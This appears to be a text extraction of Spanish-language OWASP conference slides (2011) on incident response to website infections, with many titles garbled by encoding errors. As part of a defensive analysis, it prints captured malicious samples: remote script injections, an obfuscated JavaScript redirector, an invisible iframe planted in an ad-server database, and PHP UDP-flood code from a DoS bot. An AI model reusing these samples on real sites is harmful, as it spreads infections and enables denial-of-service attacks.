o Amenaza ?

Transcripción

o Amenaza ?
4/26/11
¿ Comida
o Amenaz
a?
Respuesta a incidentes en infecciones web
Carles Fragoso Mariscal
VII OWASP Spain Chapter Meeting ! Barcelona, 15 de Abril del 2011
Organiza:
Patrocina:
Colabora:
2
1
4/26/11
#$%&'()*%"+,-.+/0"
– 
– 
– 
– 
– 
Departament de Governació
Secretaria de Telecomunicacions i Societat de la Informació
Departament d’Interior
Departament d’Innovació, Universitats i Empresa
Centre de Telecomunicacions i Tecnologies de la Informació de
la Generalitat de Catalunya
• 
Agència ACC1Ó
• 
Consorci Administració Oberta de Catalunya
• 
Ajuntament de Reus
• 
Consell de Cambres de Comerç de Catalunya
• 
e-la Caixa
• 
Fundació Barcelona Digital
• 
Universitat Rovira i Virgili
!"
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. 
2. 
3. 
4. 
Contexto
Tendencias de ataque
Respuesta a Incidentes
Conclusiones
2
4/26/11
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. 
2. 
3. 
4. 
Contexto
Tendencias de ataque
Respuesta a Incidentes
Conclusiones
enda…
¿En qué ti
entrarías?
ito
Jorg
a
Perico
Drupa
Lupit
l
la
Joom
Nuke
PHP
teban
La Es S
CM
3
4/26/11
+7%52:57;"/<2%523"
•  Contenidos
–  Propietario de los contenidos/información/marca
–  Operadores/Usuarios de generación/administración de contenidos
–  Usuarios/visitantes
•  Plataforma tecnológica
–  Administradores/operadores de la plataforma
–  Proveedores de hosting/housing/cloud
•  Infraestructura, servicio, aplicación"
–  Empresas de desarrollo o integración
–  Proveedores de contenidos terceros (ads, widgets!)
•  Seguridad
–  Proveedores de listas de reputación
–  Fabricantes de detección/contención de código malicioso
des ?
bilida
a
s
n
o
p
–  Proveedores de auditoria/revisión de aplicaciones/código
¿ Res
¿Qué com
prarías
="
4
4/26/11
+7%52:57;"+)92>(>)?2%"
•  Los delincuentes y mafias de toda la vida se han pasado a la Internet
motivados por:
– 
– 
– 
– 
Incremento del uso por parte de los usuarios
Vulnerabilidad de los sistemas
Facilidad y “anonimato” a la hora de realizar acciones remotamente
“Vacío” o lentitud en el ámbito legal-judicial
•  Estos han motivado la creación de toda una colección de software
malicioso y servicios pensados para el cibercrimen
–  Código malicioso para múltiples entornos (escritorio, web...)
–  Paneles de control y administración de sistemas infectados
•  Las nuevas ‘armas digitales’ permiten realizar:
–  Robo de credenciales, datos bancarios y personales, etc.
–  Envío de correo basura
–  Ataques de denegación de servicio
ISP de cibercrim
• 
Bla
10
5
4/26/11
Listado de “Exploit Packs”
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
Adrenaline Pack
Eleonore
LuckySploit
Fragus
ElFiesta
Napoleon Sploit
Siberia
Unique Pack
JustExploit
Sploit25
Phoenix Zeus
Liberty
Neon
ZoPAck
6
4/26/11
Lista de familias de código malicioso
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
BlackEnergy
Kraken
Waledac/Storm/Nuwar
Srizbi
Gumblar
Sinowal/Torpig
Ozdok
Pushdo
Zeus
Koobface
Spyeye
Oficla/Sasfis
Mariposa
13
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. 
2. 
3. 
4. 
Contexto
Tendencias
Respuesta a Incidentes
Conclusiones
7
4/26/11
@>79'9)A)&'&"&2"B)3$'A)C'()*%"829")%62(5'&'"
Fuente: Dasient Smartweb Security
www.piltrafilla.net
¡¡Reputación!!!
8
4/26/11
¡Infección!
DE"
¿Cómo nos…
atacan?
9
4/26/11
02%&2%()'3;"+*&)<7"?'A)()737"
•  Punto de inserción
–  Código fuente
–  Ficheros de inclusión
–  Entradas en base de datos
•  Formato
–  Scripts (javascript)
–  Marcos (iframe)
–  Objetos (java, flash, PDF")
•  Técnicas antiforenses
–  Ofuscación de código
–  Detección de crawlers y IPs de CERT/LEO
–  Detección de herramientas forenses
+*&)<7"?'A)()737"2%"F(G2>7"'%2:'&7"
</div>
</div>
</div>
<script src="http://nt010.cn/E/J.JS"></script><script src='http://
nt004.cn/E/J.JS'></script></body>
</html>
<html><body><script>function decoder(){var gfh=new Array
(213,57,39,219,247,55,122,92,13,198,41,6,217,113,106,222,203,43,9,1
80,77,250,123,222,235,119,203,90,81,168);var scp=28;for(;scp>=1;)
{gfh[scp]=((((~gfh[scp])&0xff)>>7)|((((~gfh[scp])&0xff)<<1)&0xff))
^gfh[0];scp--;}var scp=3;while(scp<=28){gfh[scp]=((((~gfh[scp])
&0xff)^gfh[2])>>4)|(((((~gfh[scp])&0xff)^gfh[2])<<4)&0xff);scp++;}
var scp=1;do{if(scp>27)break;gfh[scp]=((((((-gfh[scp])&0xff)<<7)
&0xff)|(((-gfh[scp])&0xff)>>1))-234)&0xff;scp++;}while(true);return
String.fromCharCode(gfh[1],gfh[2],gfh[3],gfh[10],gfh[14],gfh
[16],gfh[18],gfh[20],gfh[21],gfh[23],gfh[24],gfh[26],gfh[27],gfh
[28]);}window.location="/E/J.JS?"+decoder();</
script><br><br><center><h3><B7><C3><CE><CA><B1><BE><D2><B3><C3><E6>
<A3><AC><C4><FA><B5><C4><E4><AF><C0><C0><C6><F7><D0><E8><D2><AA><D6
><A7><B3><D6>JavaScript</h3></center></body></html>
HI"
10
4/26/11
+*&)<7"?'A)()737"2%"2%5>'&'"9'32"&2"&'573"
mysql> select * from ox_audit where date_sub(’YYYY-MM-DD',
interval 1 day) <= updated;
| auditid | actionid | context
| contextid | parentid |
details
| userid | username
| usertype | updated
|
account_id | advertiser_account_id | website_account_id |
|
1234 |
2 | banners
|
123|
NULL | a:
3:{s:6:"append";a:2:{s:3:"was";s:0:"";s:2:"is";s:
137:"<iframe src="http://A.B.C.D/tds/in.cgi?default"
width="1" height="1" hspace="0" vspace="0" frameborder="0"
scrolling="no"></iframe>";}s:8:"key_desc";s:36:”CAMPAIGN
NAME";s:10:"campaignid";s:3:"168";}
|
1 | user |
0 | YYYY-MM-DD HH:MM:SS |
1 |
12
|
NULL |
02%&2%()'3;"/9$37"
• 
• 
• 
• 
Distribución de código malicioso
Denegación de servicio
Envío de correo basura
Redirección a contenidos: phishing, venta de viagra"
11
4/26/11
J>22%-G2AA;"K7-"LK@"M77&2>"N)%52>6'(2O"
J>22%-G2AA;"K7-"LK@"M77&2>"N(*&)<7O"
for($i=0;$i<65000;$i++){
$out .= 'X';
}
while(1){
$pakits++;
if(time() > $max_time){ break; }
$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<br><b>UDP Flood</b><br>Completed with $pakits (" .
round(($pakits*65)/1024, 2) . " MB) packets averaging ".
round($pakits/$exec_time, 2) . " packets per second \n";
echo '<br><br>
12
4/26/11
-2%&07;",%BP7"&2"(7>>27"9'3$>'"Q"4G)3G)%<"
02%&2%()'3;"R2(57>"&2"'5'S$2"
•  Compromiso masivo mediante vulnerabilidades
–  Ej: IIS/ASP (Lizamoon), diversos CMS"
•  Inserción de código malicioso en anuncios
–  Ej: Software anuncios (OpenX), redes de terceros"
•  Robo de credenciales FTP/HTTP
–  Ej: Botnet Bredolab
13
4/26/11
HE"
.%62(()*%"!"##$%&"T42%U"
14
4/26/11
.%62(()*%"47>">797"&2"(>2&2%()'A23;"@)2C'3"
'()*+,-"
V)5"
J2357>"
!+-#$-.
+*&)<7"
?'A)()737.
!+-.
/0,&0,#1"
V)5"
23%,)-"
&2")%62(()*%"
12(7A2(57>"
&2"
(>2&2%()'A23.
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"+7%52:57"
Atacante
Víctimas
Propietario
Administrador
15
4/26/11
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"@>24'>'()*%!
1
Alojamiento de
crimeware
12(7A2(57>"
(>2&2%()'A3.
J2357>"
4+-#$-.
2
Publicar contenidos de
phishing o de ingeniería social
W)5"&2"(7&)"
'()*+,-.
W)5"&2"
423('"
2A2(5>X%)('.
3
Engaño al administrador con
técnicas de ingeniería social
Mensajería
Correo electrónico
Redes sociales
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;",%<'Z7"
5
Gestor de bots y
recepción de credenciales
12(7A2(57>"
(>2&2%()'A3.
4
J2357>"
4+-#$-.
Administrador infectado
con código malicioso bot
Y75.
16
4/26/11
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;".%62(()*%"
6
Procesado de credenciales y
preparación infección
-(>)45"
.%62(()*%.
12(7A2(57>"
(>2&2%()'A23.
7
Infección de páginas web
con credenciales robadas
Y75.
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;".%62(()*%"
9
Infección y control de
nuevos sistemas
J2357>"
4+-#$-.
7
Accesos legítimos
al servidor web
'()*+,-"
V)5.
8
Entrega de código
infectado a los usuarios
Y75.
17
4/26/11
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"+7%5>7A"
10
Administración de
sistemas infectados
Y75.
J2357>"
4+-#$-.
Y75.
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. 
2. 
3. 
4. 
Contexto
Tendencias
Respuesta a Incidentes
Conclusiones
18
4/26/11
1234$235'"'")%()&2%523"["'%\A)3)3"67>2%32"
+,-'./!
•  Gestores
•  Analistas
•  Forenses
•  Consultores
"#$$%&'#()%*!
•  Kit de respuesta
•  Intercepción
•  Entorno de pruebas
•  Herramientas forenses
0$/1#*/*!
•  Recogida de evidencias
•  Análisis de información
•  Ingeniería inversa
•  Análisis forense
•  Investigación
#A$]7"&2">234$235'"'")%()&2%523"
2#*.-#*)%!
$#&/)%!
45,-'*'1'6(!
7!.$#*#$8%1'6(!
4(93'*'*!7!
'(8#*:;%1'6(!
<(=/$&#*!
2#*.-#*)%!
.$#*#(1'%3!
!="
19
4/26/11
1234$235'"'")%()&2%523"
C/:D1%1'6(!
45,-'*'1'6(!7!
.$#%(93'*'*!
>#)#11'6(!
7!)$'%?#!
2#1-.#$%1'6(!
<(=/$&#!
4(@3'*'!
B/()#(1'6(!
+$$%5'1%1'6(!
A#;-'&'#()/!
1234$235'"'")%()&2%523;"^257&7A7<P'"
•  Preparación
–  Entorno “sandbox” con las herramientas adecuadas y con
conectividad limitada y de forma anónima (proxies)
–  Kit de respuesta presencial (portátil, sonda, maletín")
–  Procedimiento de recogida de información en clientes y servidores
•  Respuesta
–  Revisión estática/dinámica desde entorno sandbox con
herramientas de control del navegador (protección)
–  Scripts de revisión de servidor para identificar elementos infectados
–  Contención/monitorización mediante firmas WAF/IPS
–  Recogida de información preliminar de fuentes de inteligencia
–  Procedimiento de limpieza de máquinas infectadas
–  Coordinación/actuación sobre dominios y IPs de terceros
•  Análisis
–  Análisis dinámico con herramientas tipo sandbox
–  Ingeniería inversa de código malicioso y otros artefactos
20
4/26/11
<()#$(#)
!
B/$)%=-#;/*!
2/-)#$*!!
8'$)-%3#*!
+()/$(/!5#!'(8#*:;%1'6(!
+()/$(/!!
5#!.$-#E%*!
+()/$(/!5#!
8'$)-%3')F%1'6(!
1234$235'"'".%()&2%523;"_2>>'?)2%5'3"&2"'%\A)3)3"
• 
Análisis dinámico
–  Wepawet
http://wepawet.iseclab.org/
–  Anubis
http://anubis.iseclab.org/
• 
Deofuscación
–  Jsunpack
http://jsunpack.jeek.org/
–  Malzilla
http://malzilla.sourceforge.net/
• 
Revisión de código malicioso
–  Virustotal
–  Team Cymru Malware Hash Database
• 
Otros
–  Firefox plugins: Adblock, Noscript, StopAutoplay, Flashblock
–  Wireshark/Tshark ! Sysinternal Tools
–  Fiddler / FiddlerCap
http://www.fiddler2.com/fiddler2/
–  Fireshark
http://fireshark.org/
`H"
21
4/26/11
_2>>'?)2%5'3;"#)&&A2>"N5$!.6$!711$%O"
_2>>'?)2%5'3;"#)&&A2>+'4"N3")-7%"6+%O"
22
4/26/11
#)>23G'>V;"a29"/%'A[3)3""
`b"
Q2 2010: Infection Library
.%67>?'()*%"&2")%52A)<2%()';"K'3)2%5".%62(c7%"d)9>'>["
23
4/26/11
.%67>?'()*%"&2")%52A)<2%()';"#)%&)%<"17<$,"e2587>V3"
www.maliciousnetworks.org
1234$235'"'".%()&2%523;".%67>?'()*%"&2")%52A)<2%()'"
•  ABUSE.CH Malware Database
http://amada.abuse.ch/
•  Malc0de Database
http://malc0de.com/database/index.php
•  Malware Domain List
http://www.malwaredomainlist.com/mdl.php
•  Host Exploit
http://hostexploit.com/
•  Malicious Networks
http://www.maliciousnetworks.org
•  Google Safebrowsing
http://www.google.com/safebrowsing/diagnostic?site=dominio.tld
`="
24
4/26/11
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. 
2. 
3. 
4. 
Contexto
Tendencias
Respuesta a Incidentes
Conclusiones
Conclusiones
25
4/26/11
+7%(A$3)7%23"
•  Las infecciones de tipo web se están incrementado exponencialmente
•  Los navegadores web siguen contando con vulnerabilidades
sobretodo en los complementos de terceros
•  Los servidores web siguen siendo expuestos debido a
vulnerabilidades en los CMS y por el robo de credenciales de sus
operadores/administradores
•  Los sistemas de reputación están ayudando ante incidentes masivos
pero no son una bala de plata
•  La sofisticación del código malicioso web va en aumento para evitar
su detección y análisis
bD"
1=$%;/*/G1#*'1%)H1%)!!!888f(23)('5f('5"
52
G1#*'1%)
26

Documentos relacionados